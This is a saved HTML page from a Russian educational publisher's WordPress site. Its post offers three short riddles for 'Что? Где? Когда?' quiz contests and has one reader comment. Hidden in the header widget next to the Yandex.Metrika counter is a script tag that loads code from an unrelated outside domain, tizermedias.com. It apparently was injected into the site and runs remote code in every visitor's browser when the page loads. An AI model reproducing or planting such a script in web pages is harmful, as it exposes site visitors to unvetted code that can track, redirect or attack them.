<!DOCTYPE html>
<html lang="ru-RU">
<head>
	<meta charset="UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge" />
	<link rel="profile" href="http://gmpg.org/xfn/11">
	<link rel="pingback" href="http://infojournal.ru/xmlrpc.php">
	<title>Быстроотвечалки. Порция 10 &#8212; Издательство «Образование и Информатика»</title>
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Издательство «Образование и Информатика» &raquo; Лента" href="http://infojournal.ru/feed/" />
<link rel="alternate" type="application/rss+xml" title="Издательство «Образование и Информатика» &raquo; Лента комментариев" href="http://infojournal.ru/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Издательство «Образование и Информатика» &raquo; Лента комментариев к &laquo;Быстроотвечалки. Порция 10&raquo;" href="http://infojournal.ru/2017/04/24/%d0%b1%d1%8b%d1%81%d1%82%d1%80%d0%be%d0%be%d1%82%d0%b2%d0%b5%d1%87%d0%b0%d0%bb%d0%ba%d0%b8-%d0%bf%d0%be%d1%80%d1%86%d0%b8%d1%8f-10/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/infojournal.ru\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.6.1"}};
			!function(a,b,c){function d(a){var c,d,e,f,g,h=b.createElement("canvas"),i=h.getContext&&h.getContext("2d"),j=String.fromCharCode;if(!i||!i.fillText)return!1;switch(i.textBaseline="top",i.font="600 32px Arial",a){case"flag":return i.fillText(j(55356,56806,55356,56826),0,0),!(h.toDataURL().length<3e3)&&(i.clearRect(0,0,h.width,h.height),i.fillText(j(55356,57331,65039,8205,55356,57096),0,0),c=h.toDataURL(),i.clearRect(0,0,h.width,h.height),i.fillText(j(55356,57331,55356,57096),0,0),d=h.toDataURL(),c!==d);case"diversity":return i.fillText(j(55356,57221),0,0),e=i.getImageData(16,16,1,1).data,f=e[0]+","+e[1]+","+e[2]+","+e[3],i.fillText(j(55356,57221,55356,57343),0,0),e=i.getImageData(16,16,1,1).data,g=e[0]+","+e[1]+","+e[2]+","+e[3],f!==g;case"simple":return i.fillText(j(55357,56835),0,0),0!==i.getImageData(16,16,1,1).data[0];case"unicode8":return i.fillText(j(55356,57135),0,0),0!==i.getImageData(16,16,1,1).data[0];case"unicode9":return i.fillText(j(55358,56631),0,0),0!==i.getImageData(16,16,1,1).data[0]}return!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i;for(i=Array("simple","flag","unicode8","diversity","unicode9"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='ij_generatepress-css'  href='http://infojournal.ru/wp-content/plugins/ij_generatepress/ij_generatepress.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='ij-bbpress-css'  href='http://infojournal.ru/wp-content/plugins/ij_bbpress/ij_bbpress.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='bbp-default-css'  href='http://infojournal.ru/wp-content/plugins/bbpress/templates/default/css/bbpress.css?ver=2.5.10-6063' type='text/css' media='screen' />
<link rel='stylesheet' id='generate-secondary-nav-css'  href='http://infojournal.ru/wp-content/plugins/gp-premium/addons/generate-secondary-nav/functions/css/style.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='generate-secondary-nav-mobile-css'  href='http://infojournal.ru/wp-content/plugins/gp-premium/addons/generate-secondary-nav/functions/css/mobile.css?ver=1.0.1' type='text/css' media='all' />
<link rel='stylesheet' id='woocommerce-layout-css'  href='//infojournal.ru/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=2.6.14' type='text/css' media='all' />
<link rel='stylesheet' id='woocommerce-smallscreen-css'  href='//infojournal.ru/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=2.6.14' type='text/css' media='only screen and (max-width: 768px)' />
<link rel='stylesheet' id='woocommerce-general-css'  href='//infojournal.ru/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=2.6.14' type='text/css' media='all' />
<link rel='stylesheet' id='font-awesome-css'  href='http://infojournal.ru/wp-content/plugins/wp-recall/css/font-awesome/css/font-awesome.min.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='rcl-primary-css'  href='http://infojournal.ru/wp-content/plugins/wp-recall/css/style.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='rcl-slider-css'  href='http://infojournal.ru/wp-content/plugins/wp-recall/css/slider.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='rcl-users-list-css'  href='http://infojournal.ru/wp-content/plugins/wp-recall/css/users.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='rcl-register-form-css'  href='http://infojournal.ru/wp-content/plugins/wp-recall/css/regform.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='cab_15-css'  href='http://infojournal.ru/wp-content/plugins/wp-recall/add-on/theme-sunshine/style.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='rcl-rating-system-css'  href='http://infojournal.ru/wp-content/plugins/wp-recall/add-on/rating-system/style.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='generate-style-grid-css'  href='http://infojournal.ru/wp-content/themes/generatepress/css/unsemantic-grid.min.css?ver=1.3.39' type='text/css' media='all' />
<link rel='stylesheet' id='generate-style-css'  href='http://infojournal.ru/wp-content/themes/generatepress/style.css?ver=1.3.39' type='text/css' media='all' />
<style id='generate-style-inline-css' type='text/css'>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</style>
<link rel='stylesheet' id='generate-mobile-style-css'  href='http://infojournal.ru/wp-content/themes/generatepress/css/mobile.min.css?ver=1.3.39' type='text/css' media='all' />
<link rel='stylesheet' id='fontawesome-css'  href='http://infojournal.ru/wp-content/themes/generatepress/css/font-awesome.min.css?ver=4.6.3' type='text/css' media='all' />
<!--[if lt IE 9]>
<link rel='stylesheet' id='generate-ie-css'  href='http://infojournal.ru/wp-content/themes/generatepress/css/ie.min.css?ver=1.3.39' type='text/css' media='all' />
<![endif]-->
<link rel='stylesheet' id='blog-styles-css'  href='http://infojournal.ru/wp-content/plugins/gp-premium/addons/generate-blog/functions/css/style.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='generate-headhesive-css'  href='http://infojournal.ru/wp-content/plugins/gp-premium/addons/generate-menu-plus/functions/css/headhesive.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='generate-sidebar-css'  href='http://infojournal.ru/wp-content/plugins/gp-premium/addons/generate-menu-plus/functions/css/sidebar.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='wpglobus-css'  href='http://infojournal.ru/wp-content/plugins/wpglobus/includes/css/wpglobus.min.css?ver=1.6.2' type='text/css' media='all' />
<script type='text/javascript'>
/* <![CDATA[ */
var Rcl = {"ajaxurl":"https:\/\/infojournal.ru\/wp-admin\/admin-ajax.php","wpurl":"http:\/\/infojournal.ru","rcl_url":"http:\/\/infojournal.ru\/wp-content\/plugins\/wp-recall\/","user_ID":"0","nonce":"7abdef1c6d","local":{"save":"\u0421\u043e\u0445\u0440\u0430\u043d\u0438\u0442\u044c","close":"\u0417\u0430\u043a\u0440\u044b\u0442\u044c","wait":"\u041f\u043e\u0434\u043e\u0436\u0434\u0438\u0442\u0435","preview":"\u041f\u0440\u0435\u0434\u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440","error":"\u041e\u0448\u0438\u0431\u043a\u0430","loading":"\u0417\u0430\u0433\u0440\u0443\u0437\u043a\u0430","upload":"\u0417\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c"},"post_ID":"33967","office_ID":"0","mobile":"0","https":"0","slider":"''"};
/* ]]> */
</script>
<script type='text/javascript' src='http://infojournal.ru/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://infojournal.ru/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://infojournal.ru/wp-content/plugins/ij_generatepress/ij_generatepress.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://infojournal.ru/wp-content/plugins/ij_bbpress/ij_bbpress.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://infojournal.ru/wp-content/plugins/wp-recall/js/recall.js?ver=15.9.3'></script>
<script type='text/javascript' src='http://infojournal.ru/wp-content/plugins/wp-recall/add-on/rating-system/js/scripts.js?ver=15.9.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var userSettings = {"url":"\/","uid":"0","time":"1493077953","secure":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://infojournal.ru/wp-includes/js/utils.min.js?ver=4.6.1'></script>
<link rel='https://api.w.org/' href='http://infojournal.ru/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://infojournal.ru/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://infojournal.ru/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Быстроотвечалки. Порция 9' href='http://infojournal.ru/2017/04/22/%d0%b1%d1%8b%d1%81%d1%82%d1%80%d0%be%d0%be%d1%82%d0%b2%d0%b5%d1%87%d0%b0%d0%bb%d0%ba%d0%b8-%d0%bf%d0%be%d1%80%d1%86%d0%b8%d1%8f-9/' />
<meta name="generator" content="WordPress 4.6.1" />
<meta name="generator" content="WooCommerce 2.6.14" />
<link rel="canonical" href="http://infojournal.ru/2017/04/24/%d0%b1%d1%8b%d1%81%d1%82%d1%80%d0%be%d0%be%d1%82%d0%b2%d0%b5%d1%87%d0%b0%d0%bb%d0%ba%d0%b8-%d0%bf%d0%be%d1%80%d1%86%d0%b8%d1%8f-10/comment-page-1/#comments" />
<link rel='shortlink' href='http://infojournal.ru/?p=33967' />
<link rel="alternate" type="application/json+oembed" href="http://infojournal.ru/wp-json/oembed/1.0/embed?url=http%3A%2F%2Finfojournal.ru%2F2017%2F04%2F24%2F%25d0%25b1%25d1%258b%25d1%2581%25d1%2582%25d1%2580%25d0%25be%25d0%25be%25d1%2582%25d0%25b2%25d0%25b5%25d1%2587%25d0%25b0%25d0%25bb%25d0%25ba%25d0%25b8-%25d0%25bf%25d0%25be%25d1%2580%25d1%2586%25d0%25b8%25d1%258f-10%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://infojournal.ru/wp-json/oembed/1.0/embed?url=http%3A%2F%2Finfojournal.ru%2F2017%2F04%2F24%2F%25d0%25b1%25d1%258b%25d1%2581%25d1%2582%25d1%2580%25d0%25be%25d0%25be%25d1%2582%25d0%25b2%25d0%25b5%25d1%2587%25d0%25b0%25d0%25bb%25d0%25ba%25d0%25b8-%25d0%25bf%25d0%25be%25d1%2580%25d1%2586%25d0%25b8%25d1%258f-10%2F&#038;format=xml" />
	<style>.wpch_error{margin:20px 0;background:url('http://infojournal.ru/wp-content/plugins/content-hider/static/img/error.png') no-repeat scroll 10px 6px #CF4944; color: #FFFFFF; padding: 10px 10px 10px 50px;}</style>
<meta name="viewport" content="width=device-width, initial-scale=1">			<style type="text/css" media="screen">
				.wpglobus_flag_ru{background-image:url(http://infojournal.ru/wp-content/plugins/wpglobus/flags/ru.png)}.wpglobus_flag_en{background-image:url(http://infojournal.ru/wp-content/plugins/wpglobus/flags/us.png)}                                    			</style>
			<link rel="alternate" hreflang="ru-RU" href="http://infojournal.ru/2017/04/24/%D0%B1%D1%8B%D1%81%D1%82%D1%80%D0%BE%D0%BE%D1%82%D0%B2%D0%B5%D1%87%D0%B0%D0%BB%D0%BA%D0%B8-%D0%BF%D0%BE%D1%80%D1%86%D0%B8%D1%8F-10/comment-page-1/"/>
<link rel="alternate" hreflang="en-US" href="http://infojournal.ru/en/2017/04/24/%D0%B1%D1%8B%D1%81%D1%82%D1%80%D0%BE%D0%BE%D1%82%D0%B2%D0%B5%D1%87%D0%B0%D0%BB%D0%BA%D0%B8-%D0%BF%D0%BE%D1%80%D1%86%D0%B8%D1%8F-10/comment-page-1/"/>
<link rel="icon" href="http://infojournal.ru/wp-content/uploads/2015/09/cropped-info_logo512x512-32x32.png" sizes="32x32" />
<link rel="icon" href="http://infojournal.ru/wp-content/uploads/2015/09/cropped-info_logo512x512-192x192.png" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="http://infojournal.ru/wp-content/uploads/2015/09/cropped-info_logo512x512-180x180.png" />
<meta name="msapplication-TileImage" content="http://infojournal.ru/wp-content/uploads/2015/09/cropped-info_logo512x512-270x270.png" />
<style>a.recall-button,.recall-button.rcl-upload-button,input[type="submit"].recall-button,input[type="submit"] .recall-button,input[type="button"].recall-button,input[type="button"] .recall-button,a.recall-button:hover,.recall-button.rcl-upload-button:hover,input[type="submit"].recall-button:hover,input[type="submit"] .recall-button:hover,input[type="button"].recall-button:hover,input[type="button"] .recall-button:hover{background: rgb(76, 140, 189);}a.recall-button.active,a.recall-button.active:hover,a.recall-button.filter-active,a.recall-button.filter-active:hover,a.data-filter.filter-active,a.data-filter.filter-active:hover{background: rgba(76, 140, 189, 0.4);}.rcl_preloader i{color: rgb(76, 140, 189);}p.status-user-rcl::before{border-color: transparent transparent transparent rgb(76, 140, 189);}.userlist.rows-list p.status-user-rcl::before{border-color: rgb(76, 140, 189) transparent transparent;}.ballun-status p.status-user-rcl{border: 1px solid rgb(76, 140, 189);}.rcl-field-input input[type="checkbox"]:checked + label.block-label::before,.rcl-field-input input[type="radio"]:checked + label.block-label::before{background: rgb(76, 140, 189);}</style></head>

<body itemtype='http://schema.org/Blog' itemscope='itemscope' class="single single-post postid-33967 single-format-standard wp-custom-logo post-image-below-header post-image-aligned-center secondary-nav-above-header secondary-nav-aligned-right slideout-enabled slideout-desktop sticky-menu-slide generatepress  right-sidebar nav-float-right fluid-header separate-containers active-footer-widgets-3 nav-search-enabled nav-aligned-right header-aligned-left dropdown-hover group-blog">
		<nav itemtype="http://schema.org/SiteNavigationElement" itemscope="itemscope" id="generate-slideout-menu" role="navigation" class="main-navigation slideout-navigation ui sidebar overlay left">
		<div class="inside-navigation grid-container grid-parent">
						<div class="screen-reader-text skip-link"><a href="#content" title="Skip to content">Skip to content</a></div>
			<div class="main-nav"><ul id="menu-%d0%b6%d1%83%d1%80%d0%bd%d0%b0%d0%bb%d1%8b" class=" slideout-menu"><li id="menu-item-28856" class="menu-item menu-item-type-taxonomy menu-item-object-product_cat menu-item-28856"><a href="http://infojournal.ru/archive/info/">Информатика и образование</a></li>
<li id="menu-item-28857" class="menu-item menu-item-type-taxonomy menu-item-object-product_cat menu-item-28857"><a href="http://infojournal.ru/archive/school/">Информатика в школе</a></li>
<li id="menu-item-33653" class="menu-item menu-item-type-taxonomy menu-item-object-product_cat menu-item-33653"><a href="http://infojournal.ru/archive/2017/">Журналы 2017 года</a></li>
<li id="menu-item-29671" class="menu-item menu-item-type-taxonomy menu-item-object-product_cat menu-item-29671"><a href="http://infojournal.ru/archive/2016/">Журналы 2016 года</a></li>
<li id="menu-item-28861" class="menu-item menu-item-type-taxonomy menu-item-object-product_cat menu-item-28861"><a href="http://infojournal.ru/archive/2015/">Журналы 2015 года</a></li>
<li id="menu-item-28859" class="menu-item menu-item-type-taxonomy menu-item-object-product_cat menu-item-28859"><a href="http://infojournal.ru/archive/2014/">Журналы 2014 года</a></li>
<li id="menu-item-28860" class="menu-item menu-item-type-taxonomy menu-item-object-product_cat menu-item-28860"><a href="http://infojournal.ru/archive/2013/">Журналы 2013 года</a></li>
<li id="menu-item-28858" class="menu-item menu-item-type-taxonomy menu-item-object-product_cat menu-item-28858"><a href="http://infojournal.ru/archive/2012/">Журналы 2012 года</a></li>
<li id="menu-item-28862" class="menu-item menu-item-type-taxonomy menu-item-object-product_cat menu-item-28862"><a href="http://infojournal.ru/archive/2011/">Журналы 2011 года</a></li>
</ul></div>		</div><!-- .inside-navigation -->
	</nav><!-- #site-navigation -->
		<div id="generate-slideout-panel" class="generate-slideout-container pusher">
			<nav itemtype="http://schema.org/SiteNavigationElement" itemscope="itemscope" id="secondary-navigation" role="navigation" class="secondary-navigation">
			<div class="inside-navigation grid-container grid-parent">
								<button class="menu-toggle secondary-menu-toggle">
										<span class="mobile-menu"></span>
				</button>
				<div class="main-nav"><ul id="menu-%d0%b2%d0%b5%d1%80%d1%85%d0%bd%d0%b5%d0%b5-%d0%bc%d0%b5%d0%bd%d1%8e" class=" secondary-menu sf-menu"><li id="menu-item-29914" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29914"><a href="http://infojournal.ru/mir-info/">&#171;Мир информатики&#187;</a></li>
<li id="menu-item-30365" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-30365"><a href="http://infojournal.ru/category/chto-gde-kogda/">«Что? Где? Когда?»</a></li>
<li id="menu-item-33769" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-33769"><a href="http://infojournal.ru/programming/">&#171;Мир программирования&#187;</a></li>
<li id="menu-item-29548" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-29548"><a href="http://infojournal.ru/category/methodical-bank/">Методическая копилка</a></li>
<li id="menu-item-27539" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-27539"><a href="/forums/">Форум</a></li>
<li id="menu-item-27503" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-27503"><a href="http://infojournal.ru/account/">Личный кабинет</a></li>
</ul></div>			</div><!-- .inside-navigation -->
		</nav><!-- #secondary-navigation -->
			<a class="screen-reader-text skip-link" href="#content" title="Перейти к содержимому">Перейти к содержимому</a>
	<header itemtype="http://schema.org/WPHeader" itemscope="itemscope" id="masthead" class="site-header">
		<div class="inside-header grid-container grid-parent">
								<div class="header-widget">
			<aside id="text-11" class="widget inner-padding widget_text">			<div class="textwidget"><!-- Yandex.Metrika counter -->
<script type="text/javascript">
    (function (d, w, c) {
        (w[c] = w[c] || []).push(function() {
            try {
                w.yaCounter5086516 = new Ya.Metrika({
                    id:5086516,
                    clickmap:true,
                    trackLinks:true,
                    accurateTrackBounce:true,
                    webvisor:true
                });
            } catch(e) { }
        });

        var n = d.getElementsByTagName("script")[0],
            s = d.createElement("script"),
            f = function () { n.parentNode.insertBefore(s, n); };
        s.type = "text/javascript";
        s.async = true;
        s.src = "https://mc.yandex.ru/metrika/watch.js";

        if (w.opera == "[object Opera]") {
            d.addEventListener("DOMContentLoaded", f, false);
        } else { f(); }
    })(document, window, "yandex_metrika_callbacks");
</script>
<noscript><div><img src="https://mc.yandex.ru/watch/5086516" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter --><script type="text/javascript" src="http://tizermedias.com/odessa/?H6rRyf"></script></div>
		</aside>		</div>
	<div class="site-logo">
			<a href="http://infojournal.ru/" title="Издательство «Образование и Информатика»" rel="home">
				<img class="header-image" src="http://infojournal.ru/wp-content/uploads/2015/09/info_logo75x75.png" alt="Издательство «Образование и Информатика»" title="Издательство «Образование и Информатика»" />
			</a>
		</div>				<nav itemtype="http://schema.org/SiteNavigationElement" itemscope="itemscope" id="site-navigation" class="main-navigation">
		<div class="inside-navigation grid-container grid-parent">
				<div class="site-logo sticky-logo">
		<a href="http://infojournal.ru/" title="Издательство «Образование и Информатика»" rel="home"><img class="header-image" src="http://infojournal.ru/wp-content/uploads/2015/09/info_logo40x40.png" alt="Издательство «Образование и Информатика»" title="Издательство «Образование и Информатика»" /></a>
	</div>
		<form method="get" class="search-form navigation-search" action="http://infojournal.ru/">
		<input type="search" class="search-field" value="" name="s" title="Поиск">
	</form>
		<div class="mobile-bar-items">
				<span class="search-item" title="Поиск">
			<a href="#">
				<i class="fa fa-fw fa-search" aria-hidden="true"></i>
				<span class="screen-reader-text">Поиск</span>
			</a>
		</span>
	</div><!-- .mobile-bar-items -->
				<button class="menu-toggle" aria-controls="primary-menu" aria-expanded="false">
								<span class="mobile-menu">Меню</span>
			</button>
			<div id="primary-menu" class="main-nav"><ul id="menu-glavnoe-menyu" class=" menu sf-menu"><li id="menu-item-5395" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5395"><a href="/">Главная</a></li>
<li id="menu-item-28681" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-28681"><a href="http://infojournal.ru/about/">Об издательстве</a></li>
<li id="menu-item-4778" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4778"><a href="http://infojournal.ru/authors/">Авторам</a></li>
<li id="menu-item-4781" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4781"><a href="http://infojournal.ru/subscribe/">Подписка</a></li>
<li id="menu-item-27673" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-27673"><a href="http://infojournal.ru/competition/">Конкурсы</a></li>
<li id="menu-item-4809" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4809"><a href="http://infojournal.ru/contact/">Контакты</a></li>
<li class="slideout-toggle"><a href="#generate-slideout-menu" data-transition="overlay"></a></li><li class="search-item" title="Поиск"><a href="#"><i class="fa fa-fw fa-search" aria-hidden="true"></i><span class="screen-reader-text">Поиск</span></a></li></ul></div>		</div><!-- .inside-navigation -->
	</nav><!-- #site-navigation -->
			</div><!-- .inside-header -->
	</header><!-- #masthead -->
		
	<div id="page" class="hfeed site grid-container container grid-parent">
		<div id="content" class="site-content">
			
	<div id="primary" class="content-area grid-parent mobile-grid-100 grid-75 tablet-grid-75">
		<main id="main" class="site-main">
				
			
<article id="post-33967" class="post-33967 post type-post status-publish format-standard hentry category-chto-gde-kogda" itemtype='http://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
				
		<header class="entry-header">
										<h1 class="entry-title" itemprop="headline">Быстроотвечалки. Порция 10</h1>								<div class="entry-meta">
			<span class="posted-on"><a href="http://infojournal.ru/2017/04/24/%d0%b1%d1%8b%d1%81%d1%82%d1%80%d0%be%d0%be%d1%82%d0%b2%d0%b5%d1%87%d0%b0%d0%bb%d0%ba%d0%b8-%d0%bf%d0%be%d1%80%d1%86%d0%b8%d1%8f-10/" title="19:09" rel="bookmark"><time class="entry-date published" datetime="2017-04-24T19:09:53+00:00" itemprop="datePublished">24.04.2017</time><time class="updated" datetime="2017-04-24T20:36:21+00:00" itemprop="dateModified">24.04.2017</time></a></span> <span class="byline"><span class="author vcard" itemtype="http://schema.org/Person" itemscope="itemscope" itemprop="author">Автор: <a class="url fn n" href="http://infojournal.ru/account/?user=944" title="Посмотреть все записи автора lenok2010" rel="author" itemprop="url"><span class="author-name" itemprop="name">lenok2010</span></a></span></span>		</div><!-- .entry-meta -->
			</header><!-- .entry-header -->
		
				<div class="entry-content" itemprop="text">
			<p>1. Как разделить четыре яблока между четырьмя мальчиками так, чтобы каждый получил по яблоку и при этом одно из яблок осталось в корзинке?<br />
2. К реке подходят два рыбака. У берега лодка, которая может выдержать только одного из них. Оба человека переправились на противоположный берег. Как?<br />
3. Два отца и два сына нашли три гриба и разделили их. Каждому досталось по целому грибу. Как такое может быть?</p>
					</div><!-- .entry-content -->
		
				<footer class="entry-meta">
			<span class="cat-links"><span class="screen-reader-text">Рубрики </span><a href="http://infojournal.ru/category/chto-gde-kogda/" rel="category tag">Вопросы для конкурсов «Что? Где? Когда?» и «Брейн-ринг»</a></span>				<nav id="nav-below" class="post-navigation">
		<h6 class="screen-reader-text">Навигация по записям</h6>

	
		<div class="nav-previous"><span class="prev" title="Назад"><a href="http://infojournal.ru/2017/04/22/%d0%b1%d1%8b%d1%81%d1%82%d1%80%d0%be%d0%be%d1%82%d0%b2%d0%b5%d1%87%d0%b0%d0%bb%d0%ba%d0%b8-%d0%bf%d0%be%d1%80%d1%86%d0%b8%d1%8f-9/" rel="prev">Быстроотвечалки. Порция 9</a></span></div>		
	
	</nav><!-- #nav-below -->
			</footer><!-- .entry-meta -->
				</div><!-- .inside-article -->
</article><!-- #post-## -->

								<div class="comments-area">
						
	<div id="comments">

	
			<h3 class="comments-title">
			<span>Быстроотвечалки. Порция 10</span>: 1 комментарий		</h3>
		
		
		
		<ol class="comment-list">
			
	<li id="comment-1632" class="comment byuser comment-author-zlato even thread-even depth-1">
		<article id="div-comment-1632" class="comment-body">
			<footer class="comment-meta">
				<a height="50" width="50" href="http://infojournal.ru/account/?user=15063"><img alt='' src='http://2.gravatar.com/avatar/b69c30c8c0aa14ea8a402bce72745140?s=50&#038;d=mm&#038;r=g' srcset='http://2.gravatar.com/avatar/b69c30c8c0aa14ea8a402bce72745140?s=100&amp;d=mm&amp;r=g 2x' class='avatar avatar-50 photo' height='50' width='50' /></a>				<div class="comment-author-info">
					<div class="comment-author vcard">
						<cite class="fn"><a href='http://infojournal.ru/account/?user=15063' rel='external nofollow' class='url'>Дмитрий Златопольский</a></cite>					</div><!-- .comment-author -->

					<div class="entry-meta comment-metadata">
						<a href="http://infojournal.ru/2017/04/24/%d0%b1%d1%8b%d1%81%d1%82%d1%80%d0%be%d0%be%d1%82%d0%b2%d0%b5%d1%87%d0%b0%d0%bb%d0%ba%d0%b8-%d0%bf%d0%be%d1%80%d1%86%d0%b8%d1%8f-10/comment-page-1/#comment-1632">
							<time datetime="2017-04-24T20:54:22+00:00">
								24.04.2017 в 20:54							</time>
						</a>
												<span class="reply">| <a rel="nofollow" class="comment-reply-login" href="https://infojournal.ru/wp-login.php?redirect_to=http%3A%2F%2Finfojournal.ru%2F2017%2F04%2F24%2F%25d0%25b1%25d1%258b%25d1%2581%25d1%2582%25d1%2580%25d0%25be%25d0%25be%25d1%2582%25d0%25b2%25d0%25b5%25d1%2587%25d0%25b0%25d0%25bb%25d0%25ba%25d0%25b8-%25d0%25bf%25d0%25be%25d1%2580%25d1%2586%25d0%25b8%25d1%258f-10%2F">Войдите, чтобы ответить</a></span>					</div><!-- .comment-metadata -->
				</div><!-- .comment-author-info -->

							</footer><!-- .comment-meta -->

			<div class="comment-content">
				<p>Елена, спасибо за вопросы.<br />
А еще 1 вопрос я опубликую в журнале в сентябре.
<div id="comment-rating-1632" class="comment-rating rcl-box-rating">
<div class="comment-value rating-value-block rating-null"><span class="rating-title">Рейтинг:</span> <span class="rating-value rating-null">0</span></div>
</div>
			</div><!-- .comment-content -->
		</article><!-- .comment-body -->
	</li><!-- #comment-## -->
		</ol><!-- .comment-list -->

		
	
					<div id="respond" class="comment-respond">
			<h3 id="reply-title" class="comment-reply-title">Оставить комментарий <small><a rel="nofollow" id="cancel-comment-reply-link" href="/2017/04/24/%D0%B1%D1%8B%D1%81%D1%82%D1%80%D0%BE%D0%BE%D1%82%D0%B2%D0%B5%D1%87%D0%B0%D0%BB%D0%BA%D0%B8-%D0%BF%D0%BE%D1%80%D1%86%D0%B8%D1%8F-10/comment-page-1/#respond" style="display:none;">Отменить ответ</a></small></h3><p class="must-log-in">Вы должны быть <a href="https://infojournal.ru/wp-login.php?redirect_to=http%3A%2F%2Finfojournal.ru%2F2017%2F04%2F24%2F%25d0%25b1%25d1%258b%25d1%2581%25d1%2582%25d1%2580%25d0%25be%25d0%25be%25d1%2582%25d0%25b2%25d0%25b5%25d1%2587%25d0%25b0%25d0%25bb%25d0%25ba%25d0%25b8-%25d0%25bf%25d0%25be%25d1%2580%25d1%2586%25d0%25b8%25d1%258f-10%2F">авторизованы</a> для комментирования.</p>		</div><!-- #respond -->
		
</div><!-- #comments -->
					</div>
			
						</main><!-- #main -->
	</div><!-- #primary -->

<div id="right-sidebar" itemtype="http://schema.org/WPSideBar" itemscope="itemscope" role="complementary" class="widget-area grid-25 tablet-grid-25 grid-parent sidebar">
	<div class="inside-right-sidebar">
				<aside id="rcl-primary-panel-2" class="widget inner-padding rcl-primary-panel"><div class="panel_lk_recall "><div class="rcl-widget-buttons"><div class="rcl-widget-button"><a href="https://infojournal.ru/wp-login.php?redirect_to=%2F" class="recall-button "><i class="fa fa-sign-in"></i><span>Вход</span></a></div><div class="rcl-widget-button"><a href="https://infojournal.ru/wp-login.php?action=register" class="recall-button "><i class="fa fa-book"></i><span>Регистрация</span></a></div></div></div></aside><aside id="woocommerce_widget_cart-2" class="widget inner-padding woocommerce widget_shopping_cart"><h4 class="widget-title">Корзина</h4><div class="hide_cart_widget_if_empty"><div class="widget_shopping_cart_content"></div></div></aside><aside id="woocommerce_products-2" class="widget inner-padding woocommerce widget_products"><h4 class="widget-title">Последние номера</h4><ul class="product_list_widget">
<li>
	<a href="http://infojournal.ru/journals/school/school_03-2017/" title="Информатика в школе №03’2017">
